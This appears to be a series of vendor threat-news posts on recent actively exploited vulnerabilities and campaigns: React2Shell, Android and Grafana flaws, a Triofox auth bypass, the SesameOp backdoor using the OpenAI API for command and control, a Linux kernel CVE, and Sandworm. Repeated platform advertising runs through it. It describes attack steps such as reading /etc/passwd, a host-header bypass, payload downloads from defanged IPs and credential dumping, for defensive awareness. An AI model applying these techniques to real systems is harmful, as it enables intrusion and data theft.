A new maximum-severity flaw (with a CVSS score of 10.0) in React Server Components (RSC), dubbed React2shell, causes a stir in the cyber threat landscape, hot on the heels of the recent exploitation of two high-severity Android Framework vulnerabilities (CVE-2025-48633 and CVE-2025-48572). Defenders have observed that multiple Chinese nation-backed groups exploit the React2Shell vulnerability, which enables RCE, putting vulnerable deployments at significant risk. 

For years, China has conducted offensive cyber operations targeting U.S. and international organizations across various sectors, often leveraging nation-state-linked APT groups such as Mustang Panda or APT41 to collect intelligence and sensitive data. 

For a half-decade, China’s nation-backed cyber operations have increasingly emphasized stealth and operational security, creating a more complex and challenging threat landscape for organizations across industries, including the public sector, as well as for the global cybersecurity community. China-linked APT groups remain the fastest and most active state-sponsored actors, often weaponizing new exploits almost immediately after disclosure. The CrowdStrike 2025 Global Threat Report indicates that China-linked threat actors increased state-sponsored cyber operations by 150%.

Register for the SOC Prime Platform, the AI-Native Detection Intelligence Platform for SOC teams to help your organization preempt emerging threats of any sophistication, advanced APT attacks, and evolving vulnerability exploitation campaigns. Click Explore Detections to access a comprehensive collection of SOC content for vulnerability exploitation, smartly filtered by a custom “CVE” tag.

Explore Detections

All detections can be applied across diverse SIEM, EDR, and Data Lake systems and are mapped to the MITRE ATT&CK® framework. They are also enriched with AI-native detection intelligence and actionable metadata, including CTI references, attack timelines, audit configuration, triage recommendations for a streamlined threat research and CTI analysis, helping teams boost operational efficiency.

Security teams can also rely on Uncoder AI to accelerate detection engineering workflows end-to-end and take advantage of automated IOC conversion into custom hunting queries, automated detection logic generation directly from threat reports, Attack Flow visualization, ATT&CK tags prediction, and AI-assisted content across multiple language formats—all within a single solution. 

React2Shell Vulnerability Analysis

Defenders recently uncovered a novel maximum-severity vulnerability in React Server Components tracked as CVE-2025-55182, aka React2Shell, which affects React 19.x and Next.js 15.x/16.x with App Router. This pre-authentication RCE flaw was responsibly reported to Meta by Lachlan Davidson, with React and Vercel jointly issuing patches on December 3, 2025. Public PoC exploits surfaced roughly 30 hours after disclosure, followed shortly by the researcher’s own PoCs. 

React2Shell arises from unsafe deserialization of payloads sent via HTTP requests to Server Function endpoints. This logical deserialization flaw in processing RSC payloads allows an unauthenticated attacker to send a crafted HTTP request to any Server Function endpoint, which React then deserializes, enabling execution of arbitrary JavaScript code on the server.

Amazon threat intel teams report that China-linked state-sponsored collectives, both established and previously unknown clusters, including Earth Lamia and Jackpot Panda, are already attempting to weaponize the flaw, which enables unauthenticated RCE through unsafe handling of RSC payloads. 

Adversaries are leveraging both automated scanners and manually executed PoCs, with some tools using evasion tactics like randomized user agents. Their activity extends well beyond CVE‑2025‑55182, with Amazon’s monitoring showing the same Chinese clusters exploiting other recent vulnerabilities, such as CVE‑2025‑1338. This underscores a systematic model, in which adversaries track new disclosures, immediately fold public exploits into their tooling, and launch broad campaigns across multiple CVEs at once to maximize target reach.

Notably, many adversaries rely on publicly posted PoCs that do not function in real deployments. The GitHub community has flagged numerous examples that misinterpret the vulnerability, including demos that improperly register dangerous modules or remain exploitable even after patching. Yet attackers continue to use them, highlighting clear behavioral trends, like rapid adoption over validation, high‑volume scanning, low barriers to entry due to public exploit availability, and log noise that can obscure more targeted attacks.

AWS MadPot telemetry confirms that adversaries are persistently iterating on their exploitation attempts. The unattributed cluster (IP 183[.]6.80.214) spent nearly an hour on December 4 repeatedly testing payloads, issuing 100+ requests over 52 minutes, running Linux commands, attempting file writes to /tmp/pwned.txt, and trying to read /etc/passwd. This demonstrates that attackers are not simply firing off automated scans but are actively debugging and refining techniques against live systems.

Notably, the threat also impacts Next.js applications using App Router. Originally assigned CVE‑2025‑66478 with a CVSS score of 10.0, it has since been marked by the NIST NVD as a duplicate of the React2Shell vulnerability.

Wiz reported that 39% of cloud environments have systems susceptible to CVE‑2025‑55182 and CVE‑2025‑66478. Although AWS services are not impacted, given the critical nature of both vulnerabilities, users are strongly urged to apply patches immediately to ensure maximum protection.

Organizations running React or Next.js on EC2, in containers, or in other self-managed environments should apply updates without delay. To minimize risks from React2Shell exploitation, immediately update affected React and Next.js applications following the AWS Security Bulletin for patched versions. As an interim measure, defenders are recommended to deploy the custom AWS WAF rule provided in the bulletin to block exploit attempts. 

Meanwhile, Cloudflare announced that it has implemented a new protection in its cloud-based WAF as a potential React2Shell mitigation step. According to the company, all customers, both free and paid, are safeguarded, provided their React application traffic is routed through Cloudflare’s proxy.

As the number of vulnerabilities actively exploited continues to rise, forward-looking organizations are prioritizing proactive cyber defenses to ensure strong and resilient security postures. SOC Prime’s AI-Native Detection Intelligence Platform helps organizations elevate their cyber defenses at scale by empowering AI technologies and top cybersecurity expertise while maximizing resource effectiveness.

The post React2Shell Vulnerability: Maximum-Severity Flaw in React Server Components Actively Exploited by China-Backed Groups  appeared first on SOC Prime.

Following the early-November disclosure of CVE-2025-48593, a critical zero-click flaw in the Android System component, a couple of other vulnerabilities in the Android framework have come to the spotlight due to their active exploitation, posing emerging risks to global organizations potentially affected by the threat. 

The two newly uncovered flaws within the Android Framework include high-severity vulnerabilities tracked as CVE-2025-48633 and CVE-2025-48572. Google has instantly responded to the threat by addressing these vulnerabilities in its monthly security updates. However, the vendor has not yet provided further insight into how these vulnerabilities are being leveraged in the wild, whether adversaries are chaining them or exploiting them independently, or the overall scope of the malicious activity.

As of November 30, the number of reported CVEs has surpassed 42,000, marking a 16.9% increase compared to 2024. The pace remains high, with an average of 128 newly disclosed vulnerabilities each day. These patterns underscore the continued urgency for proactive defense and the growing need for real-time delivery of threat detection content, enabling defenders to spot and mitigate new risks before they gain traction.

Register today for the SOC Prime Platform, the industry’s leading vendor-agnostic suite designed for real-time defense. It offers the full pipeline from detection to simulation and features the world’s largest detection intelligence dataset, with emerging threats updated daily to help organizations stay ahead of the curve. Use the Explore Detections button to view context-enriched SOC content for vulnerability exploitation, conveniently filtered by a dedicated “CVE” tag.

Explore Detections

Detection logic is compatible with dozens of leading SIEM, EDR, and Data Lake technologies and is aligned with the MITRE ATT&CK® framework for consistent threat mapping. Each detection algorithm is enhanced with AI-native detection intelligence and comprehensive metadata, including CTI references, attack timelines, audit configuration, triage recommendations, and more actionable threat context.

Security teams can further leverage Uncoder AI to streamline detection engineering by converting IOCs into custom hunting queries, generating detection logic directly from threat reports, visualizing Attack Flow diagrams, predicting ATT&CK tags, translating content across multiple formats, and automating a wide range of daily workflows end-to-end. 

CVE-2025-48633 and CVE-2025-48572 Analysis

Google has recently issued its December 2025 Android Security Bulletin, resolving 100+ vulnerabilities across multiple components, including the Framework, System, Kernel, and third-party hardware drivers. The vendor confirmed that two of these flaws, CVE-2025-48633,  an information disclosure issue, and CVE-2025-48572, a privilege escalation flaw, have been exploited in real-world attacks and may be subject to limited, targeted abuse. The December bulletin includes two patch levels to help device manufacturers deploy shared fixes more rapidly. 

On December 2, 2025, CISA added CVE-2025-48633 and CVE-2025-48572 to its Known Exploited Vulnerabilities catalog, mandating that U.S. federal agencies patch them by December 23, 2025, due to the significant risk they pose.

Security enhancements in modern Android versions significantly reduce the likelihood of successful exploitation. As feasible CVE-2025-48633 and CVE-2025-48572 mitigation steps, users should update their devices to the latest Android release and promptly apply security patches. In addition, Google Play Protect, enabled by default, helps detect and block harmful apps, particularly critical for those customers who install software from outside Google Play.

With the constantly increasing volumes of vulnerabilities exploited in the wild, proactive cyber defense measures are becoming a top priority for progressive organizations concerned about maintaining robust cyber resilience. By leveraging SOC Prime’s AI-native detection intelligence platform built for real-time defense, security teams can take their enterprise security protection to the next level and strengthen the organization’s cybersecurity posture.

The post CVE-2025-48633 and CVE-2025-48572: Android Framework Information Disclosure and Privilege Escalation Vulnerabilities Exploited in the Wild appeared first on SOC Prime.

Following the early November reveal of CVE-2025-48593, a critical RCE issue in the Android System component, another maximum-severity vulnerability is causing a stir in the cyber threat landscape. The newly identified Grafana flaw, tracked as CVE-2025-41115, could enable privilege escalation or user impersonation in specific configurations. 

Grafana, as a popular open-source analytics platform, has been abused for offensive purposes throughout the last half-decade, posing a threat to its global users. For instance, in mid-June 2025, researchers uncovered an XSS vulnerability in Grafana, CVE-2025-4123, enabling adversaries to execute malicious plugins and compromise user accounts without requiring elevated permissions. 

Such vulnerabilities underscore the growing volume of security issues impacting open-source ecosystems. The 2025 Open Source Security and Risk Analysis (OSSRA) report revealed that 86% of reviewed applications contained vulnerable open-source components, and 81% included flaws rated high or critical. These trends reinforce the ongoing need for proactive vigilance and real-time threat detection content, ensuring defenders can identify and mitigate emerging risks before they escalate.

Register now for the SOC Prime Platform, the industry-leading vendor-agnostic product suite built for real-time defenders, to discover a broad collection of curated detection content and AI-native threat intelligence, helping security teams stay ahead of attackers. Click Explore Detections to get access to context-enriched SOC content for vulnerability exploit detection filtered by the corresponding custom “CVE” tag.

Explore Detections

Detection algorithms can be applied across dozens of widely adopted SIEM, EDR, and Data Lake solutions and are aligned with the MITRE ATT&CK® framework. Additionally, each rule is enriched with AI-native threat intel, including CTI links, attack timelines, audit configurations, triage recommendations, and other in-depth metadata.

Security teams can also take advantage of Uncoder AI to instantly convert IOCs into custom hunting queries, generate detection code from raw threat reports, visualize Attack Flow diagrams, enable ATT&CK tags prediction, translate detection content across multiple formats, and perform other daily detection engineering tasks end-to-end. 

CVE-2025-41115 Analysis

Grafana has recently rolled out updated builds of Grafana Enterprise 12.3, along with refreshed versions 12.2.1, 12.1.3, and 12.0.6, each addressing a newly discovered maximum-severity vulnerability (CVE-2025-41115). The issue was discovered during an internal audit on November 4, 2025. The flaw has the highest possible CVSS score of 10.0 and affects the SCIM (System for Cross-domain Identity Management) feature, introduced in mid-spring 2025 and currently in public preview.

The issue appears in Grafana 12.x when SCIM provisioning is both enabled and configured. A malicious or compromised SCIM client can provision a user with a numeric externalId, potentially overriding internal user IDs and enabling impersonation, even of an admin account, or escalating privileges.

Exploitation requires both the enableSCIM feature flag and the user_sync_enabled option in the [auth.scim] configuration block to be enabled.

The vulnerability impacts Grafana Enterprise versions 12.0.0 through 12.2.1. Due to the fact that Grafana directly maps the SCIM externalId to its internal user.uid, numeric values can be misinterpreted as existing user IDs. In specific cases, this could cause a newly created user to be treated as an internal account with elevated privileges.Grafana instantly released patches as urgent CVE-2025-41115 mitigation measures. Due to the vulnerability severity, organizations are strongly encouraged to update immediately to reduce the risk of attacks. Rely on SOC Prime Platform that curates the world’s largest detection intelligence dataset and constantly updated detection content against emerging threats to reinforce your organization’s cybersecurity posture and preempt cyber attacks that matter most.

The post CVE-2025-41115: A Maximum-Severity Privilege Escalation Vulnerability in the Grafana SCIM Component  appeared first on SOC Prime.

Following the disclosure of CVE-2024-1086, a Linux kernel privilege escalation flaw actively exploited in ransomware campaigns, another critical vulnerability has emerged, allowing attackers to bypass authentication and conduct further malicious operations. 

In 2025, Gladinet came under the crosshairs of threat actors, flagged for critical vulnerabilities in its products actively exploited in the wild. A zero-day in Gladinet CentreStack and Triofox (CVE-2025-30406) allowed remote code execution via flawed cryptographic key management. Later, CVE-2025-11371 was observed on patched instances, letting attackers retrieve machine keys from Web.config and forge ViewState payloads that bypass integrity checks, triggering unsafe server-side deserialization and remote code execution via the earlier flaw. 

Most recently, Google’s Mandiant researchers spotted a third critical Triofox vulnerability (CVE-2025-12480), which lets attackers bypass authentication to create admin accounts and deploy remote access tools using the platform’s antivirus feature.

Detect CVE-2025-12480 Exploitation Attempts

Cybercriminals are increasingly exploiting vulnerabilities as a primary gateway into systems. ENISA’s Threat Landscape 2025 report shows that exploitation accounted for over one-fifth (21.3%) of initial access vectors, with 68% of these incidents followed by malware deployment. Combined with over 42,000 new vulnerabilities recorded by NIST this year, the trends illustrate a relentless pressure on cybersecurity teams. Every unpatched system is a potential entry point, making early detection essential to prevent large-scale compromise.

The recently identified CVE-2025-12480 vulnerability in Gladinet’s Triofox highlights this growing threat, underscoring the importance of proactive defenses to stay ahead of modern attacks. 

Register now for the SOC Prime Platform to access an extensive collection of curated detection content and AI-native threat intelligence, helping your team outscale offensive campaigns exploiting CVE-2025-12480. Press the Explore Detections button below to dive directly into a relevant detection stack.

Explore Detections

Also, you can use the “UNC6485” tag to search for more content addressing adversary TTPs related to the threat cluster activity behind these attacks. For a broader range of SOC content for vulnerability exploit detection, security engineers can also apply the “CVE” tag.

All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, cyber defenders can generate the Attack Flow diagram based on Google Mandiant’s latest research in seconds.

CVE-2025-12480 Analysis

On November 10, 2025, Google’s Mandiant Threat Defense published an in-depth analysis of CVE-2025-12480 (CVSS score 9.1), a zero-day vulnerability in Gladinet’s Triofox file-sharing and remote access platform. The vulnerability was actively weaponized by the hacking group tracked as UNC6485 as far back as August 24, 2025, allowing attackers to bypass authentication and execute malicious code with system-level privileges.

Mandiant researchers reported that UNC6485 exploited the CVE-2025-12480 vulnerability in Triofox to reach protected configuration pages. Using these pages, attackers created a native admin account named Cluster Admin through the setup process. This new account was then leveraged to upload and execute malicious files via the platform’s antivirus feature.

The antivirus feature allows users to specify an arbitrary path for the selected antivirus. Since this configured process runs under the SYSTEM account, attackers could execute arbitrary scripts with full system privileges. In this case, adversaries used the batch script centre_report.bat, which downloaded a Zoho Unified Endpoint Management System (UEMS) installer from 84.200.80[.]252 and deployed remote access tools like Zoho Assist and AnyDesk.

The attack began with a clever manipulation of HTTP host headers. By changing the host header to “localhost“, attackers abused the CanRunCriticalPage() function, which improperly trusted the HTTP host without verifying the request origin. This allowed remote access to pages that should have been restricted and spoofing the attackers’ source IP address. Once access was gained, attackers used the Cluster Admin account to execute malicious scripts via the antivirus configuration path. 

To evade detection, UNC6485 downloaded tools such as Plink and PuTTY to establish an encrypted SSH tunnel to a command-and-control (C2) server over port 433, ultimately enabling inbound RDP traffic for persistent remote access.

The vulnerability affected Triofox v16.4.10317.56372 and has been fixed in v16.7.10368.56560. Users are strongly urged to upgrade to the patched version immediately. Mitigation steps for CVE-2025-12480 also include auditing all administrator accounts for unauthorized entries, reviewing and verifying antivirus configurations, and monitoring for unusual outbound SSH traffic to detect any ongoing compromises. Also, to stay ahead of attackers and proactively detect potential vulnerability exploitation attempts, security teams can rely on SOC Prime’s complete product suite backed by AI, automation capabilities, and real-time threat intel, while strengthening the organization’s defenses at scale.

The post CVE-2025-12480 Detection: Hackers Exploit the Now-Patched Unauthenticated Access Control Vulnerability in Gladinet’s Triofox  appeared first on SOC Prime.

As the effects of CVE-2024-1086 continue to unfold, a new vulnerability has emerged, posing a menace to cyber defenders. Google has flagged a critical zero-click flaw in the Android System component responsible for managing essential device functions. CVE-2025-48593  allows attackers to execute malicious code remotely without any user interaction, potentially giving them full control over affected devices. If exploited, it could lead to data theft, ransomware deployment, or even the use of compromised smartphones as nodes in larger botnet attacks, making it one of the most urgent security risks for mobile users today.

Mobile devices have become indispensable in both personal and professional life. According to Verizon’s 2024 report, 80% of companies consider mobile devices critical to their operations, which makes them especially attractive targets for enterprise-grade cyber attackers in 2025. Many apps still contain security weaknesses, and threats such as zero-click exploits and advanced malware are on the rise, highlighting the urgent need for proactive security measures.

Sign up for the SOC Prime Platform to access the global active threats feed, which offers real-time cyber threat intelligence and curated detection algorithms to address emerging threats. All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context. Press Explore Detections to see the entire detection stack for proactive defense against critical vulnerabilities filtered by the “CVE” tag.

Explore Detections

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms.

CVE-2025-48593 Analysis

On November 3, 2025, Google released its November Android Security Bulletin, highlighting several major vulnerabilities in the Android System component. Among them, CVE-2025-48593 stands out as critical. This flaw allows attackers to execute malicious code remotely without requiring any user interaction or additional privileges, making it extremely dangerous for mobile users. 

According to Google, the vulnerability stems from insufficient validation of user input and affects Android versions 13 through 16. The flaw’s critical rating underscores its ease of exploitation and the potential for adversaries to gain unauthorized access to sensitive data, personal communications, and device resources.

Alongside this critical RCE vulnerability, Google also disclosed CVE-2025-48581, a high-severity elevation-of-privilege flaw that impacts Android 16 exclusively, allowing attackers to escalate privileges on affected devices.

These disclosures are part of Google’s coordinated vulnerability disclosure process, which notifies Android partners and device manufacturers at least one month before the public bulletin release. This timeline ensures manufacturers have sufficient time to develop, test, and distribute patches before vulnerabilities become widely known. Devices with a security patch level of 2025-11-01 or later include fixes for all vulnerabilities addressed in this bulletin. Source code patches are set to appear in the Android Open Source Project (AOSP) within 48 hours of the bulletin’s publication to ensure swift patch rollout.

As potential CVE-2025-48593 mitigation measures, users should check their device’s current security patch level through settings and install any available updates immediately. The fusion of zero-click exploitability and system-level control underscores the urgency of applying patches to safeguard sensitive data and preserve device security. 

The increasing volumes of RCE vulnerabilities uncovered in popular software products require ultra-resilience from defenders. By leveraging SOC Prime’s AI-Native Detection Intelligence Platform, organizations can anticipate, detect, validate, and respond to cyber threats faster and more effectively, while maximizing team productivity.

The post CVE-2025-48593: Critical Zero-Click Vulnerability in Android Enables Remote Code Execution appeared first on SOC Prime.

AI-driven cyber-attacks are rapidly reshaping the threat landscape for businesses, introducing a new level of sophistication and risk. Cybercriminals are increasingly using artificial intelligence to power financially motivated attacks, with cyber threats like FunLocker ransomware and Koske malware as the most recent examples. 

In a recent discovery, Microsoft’s Detection and Response Team (DART) identified a highly advanced backdoor that leverages the OpenAI Assistants API in a completely novel way—as a command-and-control (C2) communication channel. This method allows attackers to discreetly manage and coordinate malicious operations within infected systems, avoiding traditional security defenses. The discovery highlights how AI is being used in cybercrime, underscoring the need for businesses to remain vigilant and adapt their security strategies.

Detect SesameOp Backdoor Attacks

Organizations are entering a new era of cyber risk as attackers increasingly harness artificial intelligence to target critical business systems. Generative AI is not only creating new vulnerabilities but also enabling more sophisticated and adaptive attack methods. The Splunk State of Security 2025 Report finds that security leaders anticipate threat actors will use generative AI to make attacks more effective (32%), increase their frequency (28%), invent entirely new attack techniques (23%), and conduct detailed reconnaissance (17%). These trends underscore the urgent need for organizations to rethink cybersecurity strategies and adopt more intelligent, proactive defenses against AI-powered threats.

Register for the SOC Prime Platform to benefit from the defensive capabilities of AI and detect SesameOp backdoor attacks at the earliest stages of development. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for real-time cyber defense. Click Explore Detections below to access detection rules specifically addressing SesameOp malware activity, or use the “SesameOp” tag in the Threat Detection Marketplace.

Explore Detections

All detections are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms. For instance, security professionals can use Microsoft’s DART research details to generate an Attack Flow diagram in several clicks.

SesameOp Malware Attacks Analysis

Microsoft researchers have recently identified a novel backdoor dubbed SesameOp, distinguished by its innovative use of the OpenAI Assistants API for C2 operations. Unlike conventional methods, adversaries leveraged the OpenAI API as a covert communication channel to issue and manage commands within compromised environments. A component of the malware used the API as a relay mechanism to retrieve instructions and execute them on infected systems. The OpenAI Assistants API, used by the backdoor for C2 operations, lets developers embed AI-powered agents into applications and workflows. 

Discovered in July 2025 during Microsoft’s investigation of a long-term intrusion, SesameOp was found within a network where attackers had maintained persistence for several months. The analysis revealed a tricky structure of internal web shells linked to persistent malicious processes embedded in compromised Microsoft Visual Studio utilities via .NET AppDomainManager injection, a known defense evasion tactic.

Further hunting for similarly altered Visual Studio utilities uncovered additional components designed to support communication with the internal web shell network. One such component was identified as the new SesameOp malware. SesameOp is a custom backdoor built for long-term persistence, allowing attackers to stealthily control compromised systems, suggesting the operation’s main objective was prolonged espionage.

The infection chain includes a loader (Netapi64.dll) and a .NET backdoor (OpenAIAgent.Netapi64) that uses the OpenAI Assistants API as its C2 channel. The DLL, heavily obfuscated with Eazfuscator.NET, is built for stealth, persistence, and encrypted communication. At runtime, Netapi64.dll is injected into the host process via .NET AppDomainManager injection, triggered by a specially crafted a .config file bundled with the host executable.

OpenAIAgent.Netapi64 houses the backdoor’s core functionality. Despite its name, it does not use OpenAI SDKs or run models locally; rather, it polls the OpenAI Assistants API to retrieve compressed, encrypted commands, decrypts and executes them on the host, and then returns the results as API messages. Compression and encryption are used to keep both incoming payloads and outgoing responses under the radar.

Malicious messages use three description types: SLEEP (pause the thread), Payload (extract instructions from the message and run them in a separate thread), and Result (return execution output to OpenAI with the description set to “Result”). Although the identities of the adversaries linked to the offensive campaign remain unknown, the case highlights the continued abuse of legitimate services to hide malicious activity. To raise awareness, Microsoft shared its findings with OpenAI, which disabled the suspected API key and account. OpenAI plans to deprecate this API in August 2026, replacing it with the new Responses API.

As potential mitigation steps to preempt SesameOp backdoor attacks, the vendor recommends regularly auditing firewalls and web server logs, securing all Internet-facing systems, and using endpoint and network protections to block C2 communications. It’s essential to ensure that tamper protection and real-time protection are enabled in Microsoft Defender, run endpoint detection in block mode, and configure automated investigation and remediation to quickly address the potential threat. Additionally, teams should enable cloud-delivered protection and block potentially unwanted applications to reduce the risk posed by evolving attacks.The growing use of cyber-attacks employing innovative methods and AI technology demands heightened vigilance from defenders to stay ahead of adversaries.

The emergence of SesameOp, a backdoor that uniquely exploits the OpenAI API as a C2 channel to covertly coordinate malicious activity, reflects the trend of increasingly sophisticated tactics employed by threat actors. By relying on AI-Native Detection Intelligence Platform for SOC teams, which provides real-time, cross-platform detection intelligence to anticipate, detect, validate, and respond to cyber threats faster and more effectively, global organizations can build a resilient cybersecurity ecosystem and preempt attacks that matter most. 

The post SesameOp Backdoor Detection: Microsoft Discovers New Malware Abusing OpenAI Assistants API in Cyber-Attacks appeared first on SOC Prime.

Immediately after reports of CVE-2025-59287, a critical RCE flaw in WSUS systems, being exploited in the wild, another high-severity Linux kernel flaw has been observed being actively weaponized in ransomware attacks. CISA confirmed its exploitation and warned that abusing  CVE-2024-1086 in offensive campaigns allows attackers with local access to gain root privileges on affected systems.

For the third year running, exploited vulnerabilities remain the most common technical root cause of ransomware attacks, involved in 32% of incidents, according to The State of Ransomware 2025 report by Sophos. Ransomware groups are increasingly leveraging software flaws as a primary entry point into enterprise systems, while social engineering and stolen credentials continue to play a major role in attacks. With over 40,000 new vulnerabilities logged by NIST this year, organizations face a growing challenge, as proactively identifying and fixing these flaws is essential to reducing the attack surface and defending against increasingly sophisticated ransomware threats.

Sign up for the SOC Prime Platform to access the global active threats feed, which offers real-time cyber threat intelligence and curated detection algorithms to address emerging threats. All the rules are compatible with multiple SIEM, EDR, and Data Lake formats and mapped to the MITRE ATT&CK® framework. Additionally, each rule is enriched with CTI links, attack timelines, audit configurations, triage recommendations, and more relevant context. Press the Explore Detections button to see the entire detection stack for proactive defense against critical vulnerabilities filtered by the “CVE” tag.

Explore Detections

Additionally, cyber defenders might bullet proof their defenses with a curated detection stack addressing ransomware attacks. Just search for relevant detection content in Threat Detection Marketplace using “Ransomware” tag.

Security engineers can also leverage Uncoder AI, an IDE and co-pilot for detection engineering. With Uncoder, defenders can instantly convert IOCs into custom hunting queries, craft detection code from raw threat reports, generate Attack Flow diagrams, enable ATT&CK tags prediction, leverage AI-driven query optimization, and translate detection content across multiple platforms.

CVE-2024-1086 Analysis

CISA has recently released an urgent warning about a critical Linux kernel flaw, identified as CVE-2024-1086. This critical use-after-free bug (with a CVSS score of 7.8), hidden within the netfilter: nf_tables component, allows adversaries with local access to gain root privileges on affected systems and potentially deploy ransomware, which could severely disrupt enterprise systems worldwide or possibly cause arbitrary code execution.

The flaw was disclosed and patched in January 2024, though it originated from code introduced back in 2014. It was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 30, 2024, and in late October 2025, CISA issued a notification confirming that the vulnerability is known to be actively used in ransomware campaigns. Notably, the proof-of-concept (PoC) exploit for the flaw is available since March 2024, when a researcher using the alias “Notselwyn” published a CVE-2024-1086 PoC on GitHub, demonstrating local privilege escalation on Linux kernels from 5.14 through 6.6.

Exploiting this vulnerability, attackers can bypass security controls, gain administrative access, and move laterally across networks. Once root privileges are obtained, ransomware operators can disable endpoint protections, encrypt critical files, exfiltrate sensitive data, and establish persistent access.

The netfilter subsystem, responsible for packet filtering and network address translation, makes this vulnerability particularly valuable for attackers seeking to manipulate network traffic or weaken security mechanisms. Typically, CVE-2024-1086 is exploited after adversaries gain an initial foothold through phishing, stolen credentials, or internet-facing vulnerabilities, turning limited user access into full administrative control.

CISA’s classification of CVE-2024-1086 as a vulnerability “known to be used in ransomware campaigns” underscores its severity and the urgent need for organizations to verify patch deployment and implement mitigating controls across Linux environments.

As a potential CVE-2024-1086 mitigation measure, the vendor advises disabling namespace creation for unprivileged users. To turn it off temporarily, running sudo sysctl -w kernel.unprivileged_userns_clone=0 is recommended, while executing echo kernel.unprivileged_userns_clone=0 | \ sudo tee /etc/sysctl.d/99-disable-unpriv-userns.conf serves asa persistent change after reboot. 

Enhancing proactive cyber defense strategies is crucial for organizations to effectively and promptly reduce the risks of vulnerability exploitation. By leveraging SOC Prime’s complete product suite for enterprise-ready security protection backed by top cybersecurity expertise and AI, global organizations can future-proof cyber defense and strengthen their cybersecurity posture. 

The post CVE-2024-1086 Vulnerability: Critical Privilege Escalation Flaw in Linux Kernel Exploited in the Ransomware Attacks appeared first on SOC Prime.

Since a full-fledged war in Ukraine, russia-backed hacking collectives have intensified their malicious activity against Ukraine and its allies in the cyber front line to conduct espionage operations and cripple the critical systems. For instance, a nefarious Sandworm APT group (aka UAC-0082, UAC-0145, APT44) has been attacking Ukrainian organizations for over a decade, primarily targeting government agencies and the critical infrastructure sector.

The Symantec and Carbon Black researchers have recently uncovered a two-month-long campaign targeting a major business services company in Ukraine and a separate week-long attack against a local state body. Notably, attackers primarily relied on Living-off-the-Land (LotL) techniques and dual-use tools to achieve persistent access. 

Detect Latest Attacks Against Ukraine by russian Hackers

Cyber defenders are facing growing pressure as russian threat actors evolve their tactics and sharpen their stealth capabilities. Since the beginning of the war in Ukraine, these state-backed APT groups have intensified operations, exploiting the conflict to experiment with and refine cutting-edge cyberattack strategies. And this activity has a global impact as russia-linked actors now rank second worldwide among APT attack sources, according to ESET APT Activity Report for Q4 2024–Q1 2025.

Register for the SOC Prime Platform to detect potential russian APT attacks at the earliest stage possible. Click the Explore Detections button below to access a curated stack of detection rules designed to identify and respond to the most recent campaign leveraging LotL tactics, dual-use tools, and a custom Sandworm-linked webshell to target Ukrainian organizations.

Explore Detections

Alternatively, cyber defenders might search for relevant detection content right in the Threat Detection Marketplace by using “Sandworm” or “Seashell Blizzard” tags. 

All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and are mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Additionally, security experts might streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, security professionals can use Symantec and Carbon Black most recent report to generate an Attack Flow diagram in several clicks.

Ukraine Attacked by russian Hackers: The Latest Campaign Analysis

The russia-linked threat actors have been launching intensive attacks on Ukrainian organizations since the onset of russia’s full-scale invasion. The Symantec and Carbon Black Threat Hunting team has recently identified a persistent two-month-long campaign compromising a major business services company and a week-long intrusion into a local state entity. Both campaigns apparently intended to collect sensitive data and maintain persistent network access. Instead of deploying large-scale malware, the adversaries primarily used LotL techniques and dual-use tools to operate stealthily within the environments. 

Adversaries infiltrated the business services company by installing webshells on publicly accessible servers, likely by exploiting unpatched vulnerabilities. Among the tools used was Localolive, a custom webshell previously linked by Microsoft to a Sandworm subgroup (also known as Seashell Blizzard) and observed in an earlier long-running Sandworm intrusion campaign codenamed BadPilot to establish initial access. 

Sandworm APT associated with Russia’s GRU military intelligence is notorious for espionage and destructive operations. The group has been linked to malicious operations targeting Ukraine’s power grid, the VPNFilter attacks against routers, and the AcidRain wiper campaign against Viasat satellite modems, and is also known for targeting IoT devices. In February 2025, the group was behind another long-term campaign active since 2023, in which adversaries employed trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates to compromise Ukrainian systems.

Malicious activity at the targeted organization began in late June 2025, when attackers attempted to install a webshell from a remote IP address. After gaining access, they executed a series of reconnaissance commands (whoami, systeminfo, tasklist, net group) to map the environment. They then disabled Windows Defender scans for the Downloads folder, suggesting admin-level privileges, and created a scheduled task to perform periodic memory dumps, likely to extract credentials. 

